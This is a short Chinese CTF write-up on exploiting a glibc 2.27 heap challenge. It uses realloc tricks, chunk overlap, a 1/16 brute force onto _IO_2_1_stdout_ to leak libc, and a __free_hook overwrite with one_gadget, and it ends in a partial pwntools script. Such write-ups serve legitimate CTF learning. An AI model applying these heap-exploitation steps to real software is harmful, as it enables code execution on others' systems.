例行检查
保护全开,分析程序逻辑。发现没有输出堆内容的函数,想要泄露libc地址只能通过修改IO_FILE结构体实现。realloc函数有两个trick。在size为0时,free掉指针指向的堆块,返回0;在分配超过当前指针指向堆块大小时如果有剩余空间则扩大堆块大小。
利用思路
1.堆块free 8次放进unsortbin中,在fd上得到arena地址,通过realloc扩大堆块的特性造成堆块堆叠,就可以修改到fd部分,由于_IO_2_1_stdout_与arena只相差4位,且低三位已知,剩余一位可以爆破,概率1/16。于时可以分配到_IO_2_1_stdout_。修改flag位,且把write_base调低,下次在调用输出函数时会将libc中地址输出出来。
2.得到libc之后就可以将free_hook改为one_gadget从而getshell。
from pwn import *
libc=ELF('./libc-2.27.so')
def realloc(size,data):
io.recvuntil('>> ')
io.sendline('1')
io.recvuntil('Size?')
io.sendline(str(size))
io.recvuntil('Content?')
io.send(data)
def free():
io.recvuntil('>> ')
io.sendline('2')
def pwn()